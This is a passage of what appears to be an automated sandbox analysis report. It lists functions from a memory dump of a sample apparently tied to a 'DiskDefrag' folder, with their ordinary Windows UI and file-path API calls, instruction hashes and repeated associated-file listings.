                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3984873885-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction ID: f50cee19580f5a7b4a735ae81b0960ad1265907f2bd47cc1e7f642e33356c098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39c62f6c9bf8f9dbe62311a360a421a223595c9398a47a098b9634c644438ce1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC21A070A40316ABD730DF759C41BAB7698BB88740F050A3EB649DB391EA75EC80879D
                                                                                                                                                                                                                                                                                    Function 0040E9B0 Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040E9D6
                                                                                                                                                                                                                                                                                    • LPtoDP.GDI32(?,?,00000002), ref: 0040E9EE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EA08
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,?,0047D9F0,00000000), ref: 0040EA2E
                                                                                                                                                                                                                                                                                    • DPtoLP.GDI32(?,?,00000002), ref: 0040EA45
                                                                                                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 0040EA78
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreate$BitmapColorMode
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 451781270-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction ID: 3bfa88b0da709e4d3224c5894ad5c167e82e64c80dae2195e34fb9d2b55d46f1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 823297d3b1078f9247b71e0cb78166e85bcb58cd2136858b8ed66297f6f43318
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931E975200600AFC724DF65D984D5BB7E9FF88700B448A2DA94A8B646DB34E944CFA5
                                                                                                                                                                                                                                                                                    Function 004650D0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction ID: c3f58fe0059228c05da5b00147ff564d140f859395390daa2f6f08e4d30ee4c4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1baab8f901f74b7d771640b7584b37378778b1bccb696bde4da89b114f453174
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E21FF74900F00AAE3302F21EC89717BBF4FB85741F918D2EE5C5406A0EB3594688B4A
                                                                                                                                                                                                                                                                                    Function 004256D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042571B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00425737
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00425888
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$InvalidateRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2778011698-3236272720
                                                                                                                                                                                                                                                                                    • Opcode ID: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction ID: 0eaeb928ae6b5a569979d6d52056a3389dc0ef6ae13505e9256ef6b005c906b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b91e48737b704d3f690cfb1dc7e8588fa66482c43df7c3c5e128cf77c7356e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55510432304611DFC724EF68D8C4E9BB7A4EF88320F514A2AE95597391D774FC418BAA
                                                                                                                                                                                                                                                                                    Function 00416960 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                    • String ID: LISTVIEW
                                                                                                                                                                                                                                                                                    • API String ID: 2600991427-1680257557
                                                                                                                                                                                                                                                                                    • Opcode ID: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction ID: fa80797a93d1b306fb8333d11dc9e085901b6c38828278b42b81b7196f356a38
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 415106B56083009FC314DF68C981A6BB7E9FF88744F108A2EF59987390D778E945CB96
                                                                                                                                                                                                                                                                                    Function 00424660 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00424680
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042471F
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000002,000003E8,00000000), ref: 0042474F
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000002), ref: 00424770
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$InvalidateKillRectRedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4168450595-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction ID: 7d708aa27c06dc00fcb9f864fdcaa6ded2618e4328842cf70fbd9c9851442ce7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d72688a5271403dce2d565fb5cb8f01ebbe79f233b85fa5517f2f7365920491
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3941A23170021ADFC730EF65EC88B9AB3A5FF85315F50452EE85997290CB78A984CF69
                                                                                                                                                                                                                                                                                    Function 0041A820 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A8F4
                                                                                                                                                                                                                                                                                    • SHCreateDirectory.SHELL32(00000000,?,?,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A904
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Path$CreateDirectoryExistsFileFolderSpecial
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$\DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 106629909-1352560241
                                                                                                                                                                                                                                                                                    • Opcode ID: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction ID: 938fb3785b8e758ab9aa55aacaf13088161b2d62692eeac53cc892e3a5652775
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b0aa55b9a1a9fc4a94be1b2fda63a650aa8c59690cdb364ca348087f413052
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE4195B16083019BD300EF65DD85AABB7E4FF98714F00453EF54AD2290EB349949CBAB
                                                                                                                                                                                                                                                                                    Function 00465E00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
